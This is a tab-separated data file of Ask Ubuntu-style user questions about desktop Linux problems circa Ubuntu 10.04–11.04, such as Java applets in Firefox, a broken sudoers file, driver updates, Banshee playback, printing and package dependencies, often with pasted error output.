46428	how to diagnose issues with java ( openjre and sun java ) and firefox 4	first of all , here is my setup : ubuntu 10.04 linux 2.6.32-32-generic # 62-ubuntu smp wed apr 20 21:54:21 utc 2011 i686 gnu/linux firefox 4 java 6 issue : i am trying to use my linux machine to log into a java based remote office/terminal application for work . i 'm pretty sure this used to work on firefox 3/ubuntu 9.04 . currently , i have firefox 4 installed and i was using the standard openjre package that is installed with 10.04 . when i would try to launch the applet , i would get an html window saying the applet was running but then nothing would happen . i read these two questions : how do i get the java plugin in firefox 3.6 working ? firefox hangs on ubuntu when loading java applets . and tried switching to the official sun java 6 packages . i then tried using the java.com tools to check if i had a working version of the java plugin . the window that is supposed to display the version details in a java applet seems to work but firefox paints/locks up for about 30 seconds . if i click off of the window with the applet then click back , the applet box just displays junk/the desktop underneath the firefox window . any thoughts/suggestions/links that would help me : a. understand what is going on ? b. help resolve the issue ? i checked syslog and poked around in /var/log but none of the timestamps on the logs updated when i was having the issue . thanks in advance . update # 1 : i also ran the the below to check if the sun java was the only installed java and it appears that it is . $ sudo update-java-alternatives -l java-6-sun 63 /usr/lib/jvm/java-6-sun update # 2 : so the applet seems to work in chromium which would lead me to believe this is a firefox issue . i also got the below error in the jconsole : java.lang.classformaterror : incompatible magic value 171731060 in class file hob/hltc/jhltcap01 at java.lang.classloader.defineclass1 ( native method ) at java.lang.classloader.defineclasscond ( classloader.java:632 ) at java.lang.classloader.defineclass ( classloader.java:616 ) at java.security.secureclassloader.defineclass ( secureclassloader.java:141 ) at sun.plugin2.applet.applet2classloader.findclass ( applet2classloader.java:247 ) at sun.plugin2.applet.plugin2classloader.loadclass0 ( plugin2classloader.java:250 ) at sun.plugin2.applet.plugin2classloader.loadclass ( plugin2classloader.java:180 ) at sun.plugin2.applet.plugin2classloader.loadclass ( plugin2classloader.java:161 ) at java.lang.classloader.loadclass ( classloader.java:248 ) at sun.plugin2.applet.plugin2classloader.loadcode ( plugin2classloader.java:675 ) at sun.plugin2.applet.plugin2manager.createapplet ( plugin2manager.java:3025 ) at sun.plugin2.applet.plugin2manager $ appletexecutionrunnable.run ( plugin2manager.java:1498 ) at java.lang.thread.run ( thread.java:662 ) exception : java.lang.classformaterror : incompatible magic value 171731060 in class file hob/hltc/jhltcap01 i tried clearing the cache and search for any jar files with the above in the name but again no luck . googling led me to this : http : //stackoverflow.com/questions/2390733/incompatible-magic-value-1008813135 but not sure if that is the issue either .
46434	broken sudo : ca n't open /etc/sudoers : no such file or directory	i have a live usb persistent version of ubuntu 11.04 installed with unetbootin . after some time i experienced some bugs while upgrading the kernel and trying to use my second screen on my laptop . later then i noticed a strange , apparently unrelated problem : each time i tried to sudosomething i got the same response : sudo : ca n't open /etc/sudoers : no such file or directory sudo : no valid sudoers sources found , quitting unable to do anything requiring root privileges , i rebooted using the single boot option and was able to access the root console . i noticed the following behavior : # ll /etc/sudoers -r -- r -- -- - 0 root root 1014 2011-05-31 16:23 /etc/sudoers # cat /etc/sudoers cat : /etc/sudoers : no such file or directory is there something wrong with the hard link count being zero ? how can i change it ? the hard link count is 1 on my other computer which work correctly . the live session user still belongs to the admin group if it matters .
46436	how can i update my nvidia driver ?	i recently installed the opensource game 0ad . everything went fine , but when i run it i get the error '' you are using 260.19 . * series nvidia drivers , which may crash the game . please upgrade to 260.19.21 or later . '' how do i go about updating this driver ? i downloaded the 260.19.21 driver here . its a .bin file .
46437	why ca n't i copy a 5g file ?	i 'm trying to backup my virtualbox , but when i try to copy the .virtualbox directory to my external hard drive i get an `` file too large '' error : [ 130 amanda @ luna ~ ] $ cp -r .virtualbox /media/lacie/luna/jun012011/virtualbox cp : writing `/media/lacie/luna/jun012011/virtualbox/machines/astro/snapshots/ { 9fe69a30-d308-4754-b4e4-928eb90f93d2 } .vdi ' : file too large cp : writing `/media/lacie/luna/jun012011/virtualbox/harddisks/astro.vdi ' : file too large [ 1 amanda @ luna ~ ] $ ls -alh .virtualbox/harddisks/astro.vdi -rw -- -- -- - 1 amanda amanda 5.0g 2010-04-30 17:41 .virtualbox/harddisks/astro.vdi what should i be looking for here ?
46442	how to install windows media player ?	i need windows media player for a windows app . however they require a windows verification id for downloading for their web site . i ca n't get the current installation package . is there another location that i can download it from ? i am using the most up to date wine which in it 's wine tricks it does n't have wmp9 in it .
46446	button click issues in ubuntu 11.04	this is kind of a weird problem . my main concern is whether it 's just me or whether others are experiencing the same issue , in which case it 'll likely be fixed much faster . in short , sometimes i am unable to click on buttons and hyperlinks . i hover over them and they do n't change appearance at all . i click them and get no response . not all buttons , not all the time , and not with any kind of predictability that i 've been able to gauge . i had a file properties window open just prior to starting this thread and the close button was n't working . the x button in the window chrome worked fine . and accessing the close button via the keyboard worked fine , too . indeed , that 's how i 've worked around this issue when it crops up thus far - with the keyboard . i 've just opened the file properties window again to take a screenshot whilst hovering over the button , and now the close button works . that 's how sporadic this issue is - it 's infuriating . does anyone know if this is an already reported issue ? i googled but could n't find anything of note . thanks
46448	showing error on battery state	i am a newbie to linux and i am using ubuntu 10.10 on one of my systems . when i am trying to open it , it is showing something like `` checking battery state '' and it is not responding to any keys or anything . can any one tell me how to solve it ? i changed the cmos battery but it did n't work for me .
46453	freeze on boot if on battery	we are looking at a freshly installed ubuntu 11.04 ( 64bit ) on a lenovo thinkpad w520 with an nvidia gpu . the machine freezes eventually during startup on battery . startup on ac is fine . the only situation where booting on battery works well is : after a cold shutdown and if the battery has been removed and put back in again prior to booting . sounds stupid - but that 's what i observe . sometimes ( ! ) the grub menu is not shown on startup . in this case , the boot process will stop at the stage , when x usually starts . but freeze can also happen after the grub menu has been shown ... comments : 1 ) i find it strange , that it is depended on if plugged-in or not , how the boot process takes place prior to grub . can anybody explain ? 2 ) everything might be related to power saving treatment or to graphics driver . but i have no idea . should any linux-developer be interested in figuring out what the problem actually is , than i would be very happy to provide detailed info on my hardware / system and also i would be happy to spend time for testing .
46456	custom configuration settings for unity launcher in ubuntu 11.04 ?	although i liked the unity interface of ubuntu 11.04 , i find that few aspects of it are really annoying , like the unnecessary mouse over effect caused when the mouse pointer lingers around the top left corner near the menu bar . is there a way to configure the default settings of the unity launcher ? i would like to disable the mouse over effect . if possible i would rather prefer it to be set to always-visible-on-the-screen mode . adding to this , i use a 14 inch laptop , one or two windows when opened really clutter the unity launcher icons . i need to scroll down the launcher icons often to view stuff . is it possible to change the size of the default icons on the unity interface so that more items can be fit into it ? please let me know if there is a way to achieve these two things . thanks veekay
46462	how do i erase/format a harddisk from a live cd ?	i need to format a drive containing an old install of ubuntu 10.04 , to install vista ( not my idea ! ) vista setup apparently refuses to format non-fat32 or ntfs partitions . however , i ca n't seem to format it from my live cd ( ubuntu 11.04 ) at all ; i keep getting `` device is busy '' errors . what is the simplest way to format this drive ?
46467	is it possible to white label ubuntu one ?	is it possible to white label the ubuntu one to sell as part of a service to an existing customer ? i would like to use my brand for consistency purposes .
46472	which usenet client would you recommend for binary downloads ?	i am trying to replace windows by ubuntu , because linux simply rocks . : - ) so i am on the quest finding appropriate alternative software for ubuntu , that i used on windows ( or sometimes mac ) so far . on the mac you have unison , a really great tool - perhaps the best client i ever saw . on windows i used grabit , not as beautiful as unison , but gets the job done . but now i 'd love to read about some propositions for ubuntu . which client would you recommend ? i 'd like to read about about clients which have a gui as well as about terminal client , that do n't need too much everytime terminal configuration or in other words black magic executed while fulmoon using the foot of a crow and a pregnant earthworm and while circling counterclockwise , chanting some spell on elvish ... ; - ) by te way : ssl support would be great !
46484	are there any tools for working with pl/sql ?	i am currently using oracle sql developer , and it is driving me nuts . i keep getting the message connection is busy when trying to anything after being inactive in some minutes . sometimes pressing ctrl + shift + n does the trick , but other times it wo n't do . other times the graphics in text components get distorted . i 'm using sun 's jdk ( 6 ) . are there any other alternatives ?
46485	fakeroot debian/rules binary error	i have a package i 'm maintaining . when i issue `` fakeroot debian/rules binary '' i get this error : dh_install -- sourcedir=debian/tmp cp : can not stat `debian/tmp/usr/share/prg/1.svg ' : no such file or directory dh_install : cp -a debian/tmp/usr/share/prg/1.svg debian/prg//usr/share/prg/ returned exit code 1 make : * [ install-arch ] error 2 i am unable to rectify this error . i can issue `` cd debian/tmp/usr/share/prg '' then `` ls '' and voila the 1.svg actually does exist . in my makefile : dist_pkgdata_data = 1.svg and in my prg.install file : usr/share/prg/1.svg etc/config.ini the config.ini file has no issue installing . any suggestions would be greatly appreciated . thank you
46487	how to read the subtitles in totem immediately ?	i have successfully managed to load subtitles in totem . i checked the `` automatically load subtitle files when movie is loaded '' option . the subtitles are run . the problem : when i start the movie forward or backward , subtitles may take some time to reappear .
46490	file sync error . ( auth failed ( auth_failed ) )	i am getting '' file sync error . ( auth failed ( auth_failed ) ) '' . it brought in my other devices that are registered , registers this computer also ... .but it does n't sync this is what i did http : //pastebin.com/rekzrmdm
46491	lookit does not produce a png file that is able to be used by all image viewing applications	recently i have begun experimenting with lookit , a screen capture upload application . at this point i have not tried the upload capabilities . that is , my various screen captures are simply being saved locally . when the screen capture is saved , a png is being created and , when viewed from nautilus , an accurate thumbnail is displayed . however , when i attempt to view the file in an application such as the image viewer in ubuntu , nothing is displayed . additionally , when i tried to upload the file , photobucket.com choked . the shotwell photo viewer also would not display the png . i did find that gimp would display the image and could subsequently be edited . what is the difference between the png produced by lookit and pngs produced by other applications ? is there a fix that allows the lookit png to be viewed by all standard viewers ?
46492	icewm crashes and returns to gdm if icewm-session is run	this has been happening to me ( am i the only person running icewm ? ) ever since natty was in alpha . i installed icewm- picking it from the gdm menu results in an almost immediate return to gdm . i assume it is crashing . if i run icewm itself from gdm by installing a modified desktop file , it 's fine , but then i miss out on several icewm features , like running a startup file . i have asked several places and did google searches but they do n't turn up anything . i have reinstalled icewm several times . natty is the only dist this happens on ... i also run maverick and debian sid on other partitions . any ideas ? ? ?
46494	will moving music to another folder mess up banshee 's metadata ?	i 'm about to move all of my music into another folder called music , and i 've spent a lot of time organizing the metadata of it . when i move the music into another folder , will my custom metadata be lost ? i 'm running banshee 2.0.1 on ubuntu lucid .
46497	how to isolate a process so that it can only see one network interface ?	is there a way to make only one specific network interface ( e.g . eth3 ) available to a process so that no other interfaces are visible ?
46498	clipping video files	i want to cut some video files i got , basically remove individual pieces of every video , without making some mashup or anything like it . i tried openshot video editor and avidemux . the latter got not-so-great interface , but is much easier for me , as i can cut out pieces and produce an output quickly , keeping the original codecs and quality ( which i do n't know how to properly handle and combine ) . unfortunately , it is crashing quite a lot on some files , plus it never works with wmv files , that also get mute audio ( audio v9 ) . so , i 'd like some suggestions from you guys . i could keep using avidemux if i can get it working better , or some other app , preferrably as easy as it . with openvideo , besides taking a long time re-encoding the video , i frequently do bad codec selection and mess up output quality , plus it will force the output to some predefined size , which sometimes do not match the input . thanks !
46500	why does 11.04 boot so slow on my system ?	i downloaded ubuntu 11.04 and it was working fine until i started tweaking compiz and rebooted . it took 3 to 4 minutes to boot up . when i press enter at the boot menu , there is a black screen with something flickering on the top left corner , which is normal , but for me the black screen stays for 4 to 5 mins . it is driving me crazy . please explain your answer as i am not the terminal stuff .
46501	why can other users see the files in my home folder ?	i just added a new , underprivileged `` desktop user , '' and i was surprised to discover that it can see the files in my home folder . what is the rational for setting up such lax permissions ?
46509	what video capture boards are `` plug-and-play '' compatible ?	i 'm looking for a video capture board that works in ubuntu without a lot of painful configuration or hassles . i 'm looking for an external usb-2.0 based capture board and i would prefer one with an onboard mpeg-encoder .
46510	clutterflow in nautilus elementary does nothing	ok try as i might i can not get clutterflow to work in nautilus elementary , i have seen the posts about vblank such as nautilus elementary coverflow not working ~ i have also found out that it works while running under root as in this post nautilus-clutterflow only works in `` sudo-mode '' i even tried the libpoppler route clutterflow not working on nautilus elementary but none of them work . there is no black box where clutterflow is supposed to be , no nothing . i press f4 and absolutely nothing happens . the embedded terminal is fine however . i even tried the gconf settings to show clutter and clutter test = 0 nothing works . thank you everyone for taking the time to try to help , it 's appreciated .
46516	how to setup user environ vars ?	is it possible to setup user environ before any user shell and x session ? i mean , x sessions wo n't read /etc/profile , .profile at all . and user shells wo n't read /etc/x11/* at all . i want to set such environ vars that both eclipse ide and maven cli will see them . i know i can make an eclipse.sh wrapper , so everything can be executed from a shell , but i want to know whether this question is possible .
46517	banshee suddenly stopped playing music - how do i get it working again ?	suddenly i ca n't play music in banshee 2.0 . just suddenly stopped working today . i reinstalled banshee and gstreamer , but that has n't helped . searching on google , the [ error 14:13:13.192 ] gstreamer core error : statechange error has come up a lot , and a lot of people reported it as a bug , but i found no corrections or fixes that i could apply . what do i do to get banshee to play again ? here is a section of the stream of errors i got when i ran banshee from the command line : [ info 14:12:49.083 ] [ streamrecorder.gst.marshaller ] gstreamer version found : gstreamer 0.10.32 can not connect to server socket err = no such file or directory can not connect to server socket jack server is not running or can not be started bpm_detect got error : could not open file `` song.mp3 '' for reading . gstfilesrc.c ( 1039 ) : gst_file_src_start ( ) : /gstpipeline : pipeline/gstfilesrc : filesrc : system error : permission denied [ warn 14:12:51.417 ] asked to invalidate 0+0,0x0 for hyena.data.gui.columncellrating but no canvasmanager ! [ error 14:13:13.192 ] gstreamer core error : statechange can not connect to server socket err = no such file or directory can not connect to server socket jack server is not running or can not be started [ error 14:13:14.545 ] gstreamer core error : statechange [ warn 14:13:14.567 ] service disposal ( mprisservice ) threw an exception - system.argumentnullexception : argument can not be null .
46518	wired internet ( eth0 ) suddenly stopped working - dhcpv4 timed out !	g'day , so 2 days ago , i went to bed with my internet working but when i woke up it was n't . when i had a closer look last night , it seems syslog suggests that dhcp request times out ? ! this was not happening just a couple of days ago . i 'm not sure if the computer rebooted/updated during the night , but i think it did n't ( movie still playing ) . the ethernet port light does not blink ( green is always on now , red/orange never blinks ) . what could the problem be here ? [ not at my computer right now , might take a while to print responses from terminal ] edit1 : my eth0 lists an ipv6 address but not a ipv4 address , and i 've set ipv6 to 'ignore ' , could that be an issue ?
46519	installation stops at a black screen on a dell xps 15z	this is my first time trying to install a linux distro , and i 'm having a bit of a time with it . i 've tried to install ubuntu on my new dell xps 15z using the wubi windows installer ( on x64 windows 7 pro ) and i 've also tried mounting the iso to a usb drive as explained on ubuntu.com . unfortunately , both methods hit the same problem : after some text stuff , the screen turns off . i still have control over things like keyboard brightness , so it 's not that the computer 's going idle or anything like that . any ideas ?
46520	could not install ubuntu-private-fonts	i have signed up for trying out and testing ubuntu beta monospace fonts . when i tried installing that i get the following information and i have not been able to install the font i actually wanted . note , selecting 'ttf-ubuntu-font-family ' instead of 'ubuntu-private-fonts' ttf-ubuntu-font-family is already the newest version . i would like to know why i could not install ubuntu-private-fonts ? note : i added private repository information in /etc/apt/sources.list
46521	what is the best video converter software to be played in iphone & ipod ?	what is the best video converter software to be played in iphone & ipod ? how to convert video to be played in iphone & ipod ?
46523	jungledisk desktop not showing a window after 1st run	i am using jungledisk desktop to backup my files , but on ubuntu 11.04 the main application window is not showing after the 1st run . when i delete all .jungledisk* files in my home directory the main application window is showing , but when i start the application the next time , no window is showing . only notification toasts are displayed on the top right . i already added junglediskdesktop to my systray whitelist , but that does n't help . what can i do now ?
46524	how to configure window switching functionality ?	the currently selected window is hard to tell , most of the time i have to look at the title of the selected window in the top bar , there is no highlights on the selected window , how to fix that ?
46531	what gui internet speed testing applications are available ?	i want a gui internet speed testing application ( a webapp will suffice if it is not flash ) .
46534	how to set up an apt-cacher server ?	i have more than 500 systems running ubuntu 10.04 , ubuntu 10.10 and ubuntu 11.04 . it is difficult for us to install new packages to these machines from internet , because of the high bandwidth usage . i am planning to set up an apt-cacher server , such that it should install packages from a local machine , instead of installing packages from the internet . can anyone give me a neat solution please ? thanks in advance . error in server configuration : root @ karthick : ~ # sudo /usr/share/apt-cacher/apt-cacher-import.pl /var/cache/apt/archives importing : acl_2.2.49-3_i386.deb failed to rename acl_2.2.49-3_i386.deb . try read-only ( -r ) or symlink ( -s ) options . at /usr/share/apt-cacher/apt-cacher-import.pl line 154 . error in client on installing packages can anyone sort out pls ?
46535	vim : black text on black background	i have a problem running vim . i am editing files with recognisable file extensions - .xml , .php - however the text is black . this would not be a problem except i run terminal windows with a black background . i can get to see my files by setting the terminal session to have a white background , but i would like a fix rather than a workaround . i have renamed/moved the .vim and .viminfo files in my home directory but that has not magically restored my vim settings ( that were fine yesterday morning ) . any ideas ?
46536	gnome `` character palette '' applet alternative for kde	i recently turn to kde , and i love plasma . the only think i miss is the character palette applet ( http : //library.gnome.org/users/char-palette ) . it is not a matter of accents or so , i use to mail mathematics formulae and so , i had the applet configured with the commons utf8 symbols i use : ∃αβ∀∑⊦λ≼∩↛≣≠δγψ∊ . for some other symbols i just use altgr+something ( like altgr+i for → ) , but for these symbols i do n't know any combination keys to produce them . so , my question is : is there any character palette applet alternative for kde ?
46537	how to use 'update file and folder names ' in banshee	when using 'update file and folder names ' in banshee it will leave the old folder after creating a new folder . this clutters up the ~/music ( or wherever ) directory . can it delete the old folders ? or just update the old folder names rather than creating a new one and then risk deleting any info in the old one ?
46545	limiting internet bandwidth for already started applications	this question is similar to this : limit internet bandwidth . but the wondershaper and trickle can not limit internet bandwidth for already started applications . so , how can i limit internet bandwidth for already started applications ( but only for one application , not for whole system ) ? : )
46551	firefox menu problem	my ubuntu 's firefox browser 's sub menus disappears after the screen saver is active . when i click on a menu topic like 'file ' the sub menu appears , but when i move the mouse to select a menu item , the sub menu disappears . i tried to disable the display hardware acceleration property , but it did not help .
46552	home networking with win7	ubuntu natty installed and i want to see the windows machines on my home network . i can not browse the network from the ubuntu machine , nor can i see it from any win machine ( mix of win7 and vista ) . ubuntu machine is wireless and working just fine . i would like to share files across the network as well . any help would be awesome ! thanks !
46554	how can i enable fast printing from firefox/cups using dot-matrix-printer	we are doing printing from a firefox pop-up window to a 9-pin dot matrix printer , to make printing inexpensive for our application ( epson lx 300+ , lx 300+ ii family ) . as of now , i used ibm pro printer ii and ppd for epson dot matrix printers as driver since my printer is not supported out of the box . in both cases , i am unable to do a fast printing using the default fonts in the printer . the printer gets text in bit-map/graphics so the print is time consuming . so i would like to know how i can have the default printing font changed to use the built-in fonts in printer which will print super fast ? where i can do this change - firefox or cups so that the data sent will be in a font either matching with printer default or just raw data so that printer default font used ? i already played around with printer setup and it does not look like i have an option there and the font i chose there get overridden by font sent by application . i believe cups has some setup on choosing this . a command line printout ( from terminal doing a lp testfile is also using some font other than default built-in draft/roman/san serif of the printer . any pointer to right direction is appreciated . a similar question on stackoverflow : how can i send raw data to a printer in mozilla firefox ? ( raw print ) did not help me . update : with setting up the printer as a raw printer , i could get very fast printing from a terminal ( lp mytextfile ) . with this setting , the os ( ubuntu 10.10 ) sent raw text data and printer used its font ( built-in one in rom ) to print it . but a print from firefox did not print what i expected , since it needs a post script printer , not a raw printer . what i am looking is print speed similar to raw print .
46562	firefox 's sub menus disappears after the screen saver is active	my ubuntu 's firefox browser 's sub menus disappears after the screen saver is active . when i click on a menu topic like 'file ' the sub menu appears , but when i move the mouse to select a menu item , the sub menu disappears . i tried to disable the display hardware acceleration property , but it did not help .
46565	can nfs4 with kerberos work with strong encryptions ?	is it possible to use strong encryption ( anything else than des ) with nfs4 and kerberos ? what 's required to get it working on natty ?
46568	reinstalled 11.04 but now it looks like 10.10	i had to reinstall ubuntu 11.04 but now the unity sidebar is gone and it looks like i installed 10.10 but when checking my current version it does say 11.04.does anyone know how i can get the unity sidebar and all the other stuff from 11.04 back ?
46574	notification appears on 'wrong ' screen	work provides me with four large screens , which in xinerama leads to a nice 5120 x 3200 pixel display ( running ubuntu classic , no animations ) . all very nice indeed -- - but the 'notifications ' appear in the top right of the xinerama screen ( display three out of four ) when i 'd rather have them in the top right of the 'main ' screen 0 . can i control this placement ?
46575	liboobs size mismatch when upgrading to 11.04	i get this error when trying to upgrade to 11.04 : failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/libo/liboobs/liboobs-1-5_2.32.0-0ubuntu1_amd64.deb size mismatch i already did a bunch of apt-get clean ; apt-get update ; in different days and it continues to have this problem . i know that this probably means one of these three things : the repository 's deb is broken and mismatches the checksum i have in cache . my cache 's deb is broken and mismatches the checksum i have in cache . my cache 's checksum is broken and mismatches the deb in the repository how should i try to solve this problem ?
46579	how to use alternative encoding in specific gnome applications ?	currently i 'm trying to convert an audio cd to ogg ( s ) using asunder , however , the encoding used in the cd ( gb2312 ) is different to the current x session 's ( utf-8 ) : i tried to use a different one , but c library seems not support it : $ lang=zh_cn.gb2312 asunder ( process:19031 ) : gtk-warning ** : locale not supported by c library . using the fallback 'c ' locale . ( ... and the same screenshot ... ) p.s . i have installed the language-pack-*-zh , and the encoding gb2312 is supported by iconv : $ iconv -- list | grep gb2312 csgb2312// gb2312// ( i guess c library does n't use iconv , however . ) maybe i missed something ?
46580	glxgears segmentation fault using open video driver	i have two videocards integrated ( intel i3 ) and discrete ( mobility radeon hd5470 ) . i noticed this problem , after i installed catalyst 11.5 from amd site . but there was something i could n't manage , external monitor worked only in mirror mode with fglrx , and had to revert to open drivers . i removed fglrx with fglrx-uninstall.sh . had some problems with booting to ubuntu , but i successfully managed to start it . unity works , some games like openarena , in low-medium configuration works almost perfect . i assume that open driver is working . i reenabled vgaswitcheroo , and turned off radeon ( because of overheating problems ) . but when i try glxgears , it shows me segmentation fault . dmesg shows : glxgears [ 10065 ] : segfault at 502 ip 00007f486ea4c6d5 sp 00007fffca5567e8 error 4 in libdricore.so [ 7f486ea1c000+21d000 ] what can i do now ? ps i think if i install fglrx again , segfault will disappear ( imho , did n't tested ) , but external monitor wo n't work as i need
46582	sound problems with hdmi connection	i have a little question that is n't a really problem , but affects in someway when i want to watch some movie on my hdmi tv from my laptop . so , what i ask you is since i 've erased pulseaudio and have installed alsamixer , because this is the only way to stablished a properly sound connection in skype , i 've lost the sound of my hdmi connection . the image works fine , but the sound have gone away ... there is some way to fix this ? there is a alsamixer hdmi plugin that fixes this issue ? i have a acer aspire 5542g , with amd64 bits turion ( 2,2ghz , 1mb l2 cache ) , ati mobility radeon hd 4570 . oh , i have ubuntu 11.04 natty ! everything else works fine ! ! : d thx ! jorge
46588	how to automount ntfs partitions ?	i have two ntfs partitions , and i do n't want to mount them everytime i start ubuntu . how can i do this ? is there a tool or a code to use ? if so , is it safe to automount ? specially when they are being used by another os ?
46593	i have a problem while trying to execute a command with params via java runtime	i 'm working on a java desktop aplication to manage iptables and i want to execute iptables commands via java , this is what i am doing : i execute from terminal gksu `` iptables -l '' and it worked but when i try to execute it from java runtime ( exec . ( `` gksu \ '' iptables -l\ '' `` ) ) i keep getting this output : gksu version 2.0.2 usage : gksu [ -u ] [ options ] -- debug , -d print information on the screen that might be useful for diagnosing and/or solving problems . -- user , -u call < command > as the specified user . -- disable-grab , -g disable the `` locking '' of the keyboard , mouse , and focus done by the program when asking for password . -- prompt , -p ask the user if they want to have their keyboard and mouse grabbed before doing so . -- preserve-env , -k preserve the current environments , does not set $ home nor $ path , for example . -- login , -l make this a login shell . beware this may cause problems with the xauthority magic . run xhost to allow the target user to open windows on your display ! -- description , -d provide a descriptive name for the command to be used in the default message , making it nicer . you can also provide the absolute path for a .desktop file . the name key for will be used in this case . -- message , -m replace the standard message shown to ask for password for the argument passed to the option . only use this if -- description does not suffice . -- print-pass , -p ask gksu to print the password to stdout , just like ssh-askpass . useful to use in scripts with programs that accept receiving the password on stdin . -- sudo-mode , -s make gksu use sudo instead of su , as if it had been run as `` gksudo '' . -- su-mode , -w make gksu use su , instead of using libgksu's default . i hope someone can help me : d plox : p
46596	what does the `` -ng '' suffix mean in package names ?	several package names contain the suffix -ng : $ apt-cache search `` \-ng $ '' linux-wlan-ng - utilities for wireless prism2 cards aircrack-ng - wireless wep/wpa cracking utilities apt-cacher-ng - caching proxy server for software repositories bwm-ng - small and simple console-based bandwidth monitor etpan-ng - console mail user agent based on libetpan ! fakeroot-ng - gives a fake root environment fillets-ng - puzzle game about witty fish saving the world sokoban-style fprobe - export captured traffic to remote netflow collector fprobe-ng - export captured traffic to remote netflow collector ( meta ) lemonldap-ng - lemonldap : :ng web-sso system lincity-ng - city simulator game with polished graphics netsniff-ng - a high performance network sniffer for packet inspection performous - karaoke game that allows user supplied songs procinfo - reporter for system information from /proc and /sys python-cap-ng - python bindings for libcap-ng scribus-ng - open source desktop page layout - developmental branch syslog-ng - next generation logging daemon tictactoe-ng - fun , simple , tic tac toe game turnin-ng - assignment submitter and manager ultrastar-ng - karaoke game - transitional package xpilot-ng - multi-player tactical game for x ( ng version ) what does this mean ? just expanding the acronym is n't very helpful . while i am familiar with , for example , such terms as beta and long term support , the term next generation still does n't mean anything to me . ( what is a generation ? does it have something to do with version numbers ? if a package is currently in the repositories , why is n't it current generation ? )
46604	is there a way to share my computer 's internet connection with my android through usb ?	is there a way to share my desktop internet connection with my android 2.2.1 using the phone data cable ?
46606	how do i get ubuntu music to sync my existing collection ?	i signed up for the free , 30-day trial of ubuntu mobile last night . really in hopes that i could aggregate my music collection and make it available to my mobile devices . i shared my 'music ' folder on my laptop ( ubuntu 11.4 ) . it synced with the server , but it only uploaded the file structure and some random text files , images . ie , everything but the music . so , how do i get my existing music onto the server so that i can access it on my android phone ? am i missing a tutorial somewhere ? thanks ,
46608	has anyone managed to configure nautilus to show exif data ?	i followed instructions on the ubuntu forums to configure nautilus to display additional information about image files - specifically , the exif data : [ solved ] adding mp3 info columns ( e.g . bitrate , etc . ) to nautilus list view ] my machine is running ubuntu 11.04 . having followed the procedure outlined in the above thread , i killed all instances of nautilus , restarted nautilus and selected the required columns in the view preferences . unfortunately , the date exif dateshot exif image size exif software exif flash columns are blank . the only column that displays info is image size . i followed the same procedure on my ubuntu 10.10 machine at work , and the exif data is displayed . i expected this method to work on 11.04 , as none of the steps appear to be 10.xx specific . any ideas ? thank you .
46612	my wifi connection goes really slow at times . can i set the powersaving option off permanently ?	i have a macbook pro 5,5 running ubuntu 11.04 natty amd64 . about one time every hour , my wifi connection speed goes really slow ( i guess it goes in to powersaving mode ) , and i have to run iwconfig eth1 power off ( which i have packaged in a bash script for ease ) to get back to normal speed . is it possible to set the power option to `` off '' permanently so i do n't have to do this manually every time the wifi driver decides to go in to powersaving mode ?
46613	is there a command for the `` workspace switcher '' ?	i just learned about `` whereis '' in terminal as a way to find a command to launch a given application . however , i still ca n't find ( a way to find ) the command to launch the `` workspace switcher '' in natty / unity . i 'd be interested in both the method ( s ) for finding the command as well as the command itself .
46614	loading data dvds	i switched to ubuntu and would like to load my music collection onto my drive . i have about 20 gigs on dvds , audio cds i can load , how do i do this ?
46616	webcam light turns on , when i use media applications like banshee and rhythmbox	i have an asus laptop . it is the x53 model . i use ubuntu 11.04 on it and i have no problems but when i try to open a multimedia program the led of my webcam turns on . what can i do to about it ?
46618	what happened to my menu icons ?	i have been using natty for a month now and everything is running smoothly there is only one or two problems i have come across ( on my machine ) . this problem is as far as i can tell in relation to the global menu , i like to enable menu icons as i feel having a visual cue makes it quicker to find the menu item quicker however almost all of the icons are being replaced with not found image icons . is this a bug or is there a simple fix for this ?
46619	how do i use the console fonts in normal applications ?	the fonts available for use in the console can be found in /usr/share/consolefonts/ , in files with the extension .psf.gz . fontforge does n't seem to know about them . i can convert them bdf format using gbdfed and in turn to pcf format using bdftopcf , but they are not available to applications .
46624	how to create a bootable usb with multiple iso images in it	what i want is to create a bootable pen drive that shows grub menu and i can select any of the several bootable systems from there to install/run . i have several iso images that i want to install in the usb like ubuntu , fedora , system rescue cd , windows xp and windows 7 ( the windows versions are optional , mostly am looking for a multi installer for linux distros , specially ubuntu version ) the default startup disk creator only works with linux images and only 1 at a time ( at least for the mean time . if it allows more systems and multiple isos it would be awesome ) what method exists that i can use step by step to create a bootable usb drive with multiple images than can be booted from the usb and selected from grub . it must support windows images and linux images . alternative , is there also a way to have multiple versions of the ubuntu installation iso on an usb drive , such as , when booting from it , i get to choose what ubuntu version and architecture to install , for example : boot menu ubuntu 12.04 32 bit ubuntu 12.04 64 bit ubuntu 12.10 32 bit ubuntu 12.10 64 bit update : wanted to add that the english version for the post mentioned by daithib8 is here : multisystem – create a multiboot usb from linux | usb pen drive linux
46627	how can i make a script that opens terminal windows and executes commands in them ?	i have three scripts i need to run when i start up my ubuntu machine , they start services i use in my development environment . to do that , i manually open three terminals and type in the commands . is there any way to create a script that will open three terminals and execute one command in each of these ? ( each command should be in a separate terminal window so i can see their output ) .
46637	does unity 2d use fewer system resources than unity 3d ?	does unity 2d use fewer system resources than unity 3d ? if it requires less in terms of system resources , would switching to unity 2d increase the battery life of my laptop ?
46642	what unique features has ubuntu brought to the linux community ?	red hat/fedora , gnome , kde and others have brought things that can be used in the linux community , like networkmanager , plymouth boot splash , a friendlier desktop system , etc . i would like to know what ubuntu has brought to the linux community . things that i know of are unity desktop and utouch ( which i find to be an excellent feature ) . note that i am not talking about obvious things like look & feel , huge community , etc . i am talking about features that it has added or enhanced in the linux community .
46645	installing chrome gives an error : `` dependency is not satisfiable ''	i just installed ubuntu on my laptop , everything works fine , but i 'd like to use chrome instead of firefox . i downloaded the .deb file from the chrome website , and when i open it , the install buton inside the software center is inactive ( i ca n't click it ) and it 's telling me dependency is not satisfiable : libcurl3 i did a search for libcurl3 in the software center , the three results i 'm getting are already installed . any ideas how to fix this ? i also tried installing chromium-browser , but that 's not working out neither . i 'm getting package dependencies not resolved and this details block : the following packages have unmet dependencies : chromium-browser : depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.5.2-8ubuntu4 is to be installed depends : libxdamage1 ( > = 1:1.1 ) but 1:1.1.3-1ubuntu1 is to be installed depends : zlib1g ( > = 1:1.2.3.3.dfsg ) but 1:1.2.3.4.dfsg-3ubuntu3 is to be installed depends : libnss3-1d ( > = 3.12.3 ) but it is not going to be installed
